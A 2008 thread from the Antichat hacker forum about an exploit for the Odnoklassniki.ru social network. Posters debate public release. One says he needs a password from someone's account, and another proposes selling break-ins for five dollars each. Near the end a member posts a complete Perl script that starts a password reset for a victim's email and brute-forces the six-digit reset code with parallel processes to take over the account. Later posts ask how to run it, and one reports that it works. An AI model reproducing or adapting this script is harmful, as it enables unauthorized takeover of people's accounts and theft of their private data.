Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Мировые новости (https://forum.antichat.xyz/forumdisplay.php?f=23)
-   -   Появился эксплоит для "Одноклассников.ру" (https://forum.antichat.xyz/showthread.php?t=71241)

Prod 23.05.2008 15:42

Появился эксплоит для "Одноклассников.ру"
 
Хакерская группа RST/GHC/UKT объявила в своем блоге, что ими создан эксплоит для сайта одноклассники.ру. Публикация для широкой общественности запланирована на 26 мая 2008г.

Подробности

MaTpOc 23.05.2008 16:11

Я жутко извиняюсь, но что такое эксплоит???

blood-looney 23.05.2008 16:16

Цитата:

Сообщение от MaTpOc
Я жутко извиняюсь, но что такое эксплоит???

киддерский инструмент чтобы всех похакать и быть крутым

Prod 23.05.2008 16:18

МаТрОс

http://ru.wikipedia.org/wiki/Эксплоит

NFM 23.05.2008 16:36

хы, тоже читаю их журнал =) жду одея

lmns 23.05.2008 16:58

Эх, мне как раз надо с одноклассников один пароль, а то трояны не прокатили, фейки тоже.

fucker"ok 23.05.2008 18:40

Зачем в массы. Держали бы у себя или отослали тем же админам одноклассникам. А вот теперь сколько девочек тинейджеров будут плакать, потому-что их похэкали одай сплойтом =(

Vid0k 23.05.2008 18:53

Цитата:

Сообщение от fucker"ok
Зачем в массы. Держали бы у себя или отослали тем же админам одноклассникам. А вот теперь сколько девочек тинейджеров будут плакать, потому-что их похэкали одай сплойтом =(

согласен если сполойт появится в паблике
кидисы замучают всех сначала как его юзать
а потом темами "сломаю акк одноклассники"
этоже оружие массовго поражения
по мне так лучше пусть останется в привате
или пусть лучше сначала отдадут суппорту
а потом в паблик

.acme 23.05.2008 20:44

GrAmOzEkA, туфта полная от RST/GHC ?
Подумай тридцатьдевять раз, прежде чем такое ляпнуть.
Полностью поддерживаю мнение Vid0k.

pogant 23.05.2008 20:51

Vid0k +1

SUBJECT617 23.05.2008 21:26

Должны вроде прикрыть дырку если в паблик выйдет. Не думаю что админы одноклассников будут сидеть и ждать пока куча акков будут сломаны.

Godfather Bulan 23.05.2008 21:29

Да они там щаз в панике валяются! Пока что можно воспользоваться этим и юзать сплойт!
(Белки правят миром! Мы их покорные рабы!)

Zitt 23.05.2008 23:15

а мы с егорычем говарили что эти парни еще скажут о себе громкое слово))))(када они закрывались)...
молодцы чуваки.. В паблик думаю не стоит опускать.....

70region 23.05.2008 23:26

давно пора +1 парням давно уже хекарь и закрывать эти социальные сети, нечё в них прикольного не вижу как только кроме утечки информации.

гейлордфакерЪ 24.05.2008 00:09

хех .. ну так неиграю =(
теперь приватный софт на однокласники уже неприватным будид

br3k 24.05.2008 00:26

Долго сплойт не проживет.
Элементарно его скачает программер с одноклассов, и пока будет разбирать код, думаю сервак будет в дауне ака офф.
А потом багу просто закроют и все.
Думаю там люди тоже не дураки сидят.

Spyder 24.05.2008 00:29

сидели бы лучше, выкладывали древние сплоиты у себя в блоге
потянуло их тут на новинькое =\

Karantin 24.05.2008 04:45

На хек сайтах надо повесить объявление - взломаю акк одноклассников, 5 баксов, работу выполню 26го числа. За счет массовости нарубить бабла. Написать скрипт с эскплойтом, чтобы выглядело url_odnoklassniki.ru;mail_zakazchika@mail - чтобы сплойтить и сразу на мыло заказчику результат слать.

n-000 24.05.2008 07:21

А я не думаю , что эта затея с пабликом зря ... ведь разобрав эксплойт мы все узнаем через что и как он работает, а это знания которые можно применить не только на одноклассниках!
Дыру залатают ну и что ? Она что последняя ?
Я думаю эт только начало -)

Zitt 24.05.2008 13:36

начало конца )))

brasco2k 24.05.2008 23:24

Думаю поставят статус сервис временно приостановлен заходите через 2 часа.
К тому времени программеры залатают дырку.
А еще возможно что rst спецально распускают такой слух чотбы нарушить работу сервиса.

br3k 24.05.2008 23:59

Цитата:

Сообщение от brasco2k
А еще возможно что rst спецально распускают такой слух чотбы нарушить работу сервиса.

Исключено.
Делать больше rst нечего, как распускать слухи, привликать лишнее внимание, и вообще заниматься ерундой.

Yulo 25.05.2008 10:30

Мне казалось rst уже давно распались и ничего нового не выпускают!!!..Или я не прав?
А насчет сплойта чушь полная, уже через день или пару он не будет работать.А значит смысла трудиться над ним и выпускать в паблик нет.

Vid0k 25.05.2008 10:42

Цитата:

Мне казалось rst уже давно распались и ничего нового не выпускают!!!..Или я не прав?
А насчет сплойта чушь полная, уже через день или пару он не будет работать.А значит смысла трудиться над ним и выпускать в паблик нет.
да проект закрыли но парни все равно
держут контакты и общаются через ЖЖ
у них не такой смысл как у тебя они продолжают этим заниматься потому что им нравиться а не от того чтобы зафейсить сайт или поднять бабла на новом эксплоейте и им безразницы будет работать слойт через день или два после выхода в паблик
они просто еще раз всем докажут что
даже крупные и раскрученные проекты имеют уязвимости

Karantin 25.05.2008 10:51

Vid0k, абсолютно с тобой согласен. Кому интересно - http://rstghc.livejournal.com.

Шавникс 25.05.2008 11:14

ой бля как пиарят себя

slider 25.05.2008 11:34

Будет интересно посмотреть на сплойт...

Шавникс 25.05.2008 12:13

а сзади

Чиловег Ниоткудо 26.05.2008 16:04

http://rstghc.livejournal.com/14478.html?thread=101262#t101262

чето вроде глухо....

Karantin 26.05.2008 16:16

Брутфорс кода восстановления
Код:

#!/usr/bin/perl
use LWP::UserAgent;

print qq(
  ,__                    __,                     
  \\ \\                    / /                   
    \\ \\    __      _    / /                     
      \\  .___/\\:::* /\\ /                       
          |_____\\  |/  \\                       
        /<>//,./      /      _________                           
        /      /      /  \\    |  RST               
      /      /.,\\\\<>/\\  \\  |  GHC                     
      \\      \\    /'  \\  /  |    UKT
        \\      \\  /    \\    |__\\xD____                       
        \\      \\/      /                         
      /  '''\\'''      /                             
    / /      \\  \\  / \\ \\                       
  / /        ___ \\ /  \\ \\                     
  *__                    __*
              [preved odnoklassne4gi]
               
);



if (!scalar(@ARGV)) {
    print "\[~\]Usage : ./$0 eMail {number of child procs}\n\n";
    exit();
}
if (-e "success") {
    print "\[-\] File \"success\" exists in your directory. Please rename it or remove.\n\n";
    exit();   
}

my $email="$ARGV[0]";

if ($ARGV[1]) {
    my $MAX_PROCESSES=$ARGV[1];
} else {
    my $MAX_PROCESSES=5;
}
my $DEBUG=0;

my @pids;
my $npids=0;
my $restore=0;
my $e;

# first step - omg! I lost my password?!?!?!
$ua=LWP::UserAgent->new();
$page=$ua->post("http://odnoklassniki.ru/cdk/st.cmd/password/tkn/6544",["st.email"=>$email,"st.posted"=>"set"]);
$page_content=$page->content();
if ($page_content=~/st.email/) {
    print "\[-\] Please provide correct email address\n";
    exit();
} else {
    print "\[+\] Repair password code send to $email\n";
}

# step number two - bruteforce code for repair password
print "\[~\] Brutforce code for repair password\
This process make take max ~ 18 hours to check all combinations\
You need good internet channel and fast cpu\n";
open(LOG_FILE,">>log");
$not=1;
for ($code=100000;$code<=999999;$code++) {
    if (-e "success") {
        print "DONE";
        exit();
    }
    if ($code==199999 && $not==1) {
        $cod="099999";
        $not=0;
        $code=100000;
    } elsif ($code=~/^1(\d+)$/ && $not==1) {
        $code=~/^1(\d+)$/;
        $cod="0$1";
    } else {
        $cod=$code;
    }
    if ($cod=~/^(\d+)000$/) {
        print "#";
    }

    my $pid;
    $pid=fork();
    if($pid>0){
    push(@pids,$pid);
    $npids++;
    if($npids>=$MAX_PROCESSES){
        for(1..($MAX_PROCESSES)){
          $wait_ret=wait();
          if($wait_ret>0){
                    $npids--;
                }
            }
        }
        next;
    }elsif(undef $pid){
        print "fork error\n" if ($DEBUG);
        exit(0);
    }
    $p=$ua->post("http://www.odnoklassniki.ru/dk",["st.cmd"=>"passwordReset","st.email"=>$email,"st.confirmation-code"=>$cod,"st.posted"=>"set"]);
    $con=$p->content();
    if ($con=~/password.confirmation/) {
        print "$cod cached\n";
        print LOG_FILE "$cod cached\n";
        open(SUCCESS,">>success");
        print SUCCESS "\n############################\n";
        print SUCCESS "Yahooo! Congratulations! Code for password repair is - $cod\n";
        print SUCCESS "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
        print SUCCESS "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
        print SUCCESS "############################\n";
        print "############################\n";
        print "Yahooo! Congratulations! Code for password repair is - $cod\n";
        print "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
        print "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
        print "############################\n";
        close(SUCCESS);
    } else {
        print LOG_FILE "$cod failed\n";
    }
    exit();
}
close(LOG_FILE);


Чиловег Ниоткудо 26.05.2008 16:19

это он и есть? спс...
честно говоря, так и думал, что сплойт не будет тупо выплевывать пасс... рст кросавчеги

BuzzSaw 26.05.2008 16:23

весело было сидеть в ИРКЕ и слушать всё.... потом часть людей отсеялось и вуаля..

Karantin 26.05.2008 16:29

Цитата:

Сообщение от BuzzSaw
весело было сидеть в ИРКЕ и слушать всё.... потом часть людей отсеялось и вуаля..

там еще тусует народ

.:KeepeR:. 26.05.2008 16:35

у когото сплоит запустился?
у меня выдает:
Цитата:

This process make take max ~ 18 hours to check all combinations
You need good internet channel and fast cpu

S|\/|eliyK()T 26.05.2008 16:38

Исходник читал?

.:KeepeR:. 26.05.2008 16:41

а какой нужен? Я могу и с серва запустить.... Только если он запишет результат в лог какойто

Karantin 26.05.2008 16:42

там файл log появится в папке со сплойтом

.:KeepeR:. 26.05.2008 16:44

Цитата:

там файл log появится в папке со сплойтом
а как он будет подписан?

Чиловег Ниоткудо 26.05.2008 16:45

с какими параметрами запускать?
и зачем нужен первый шаг?

Sharky 26.05.2008 19:50

всё работает...спасибо


Время: 00:02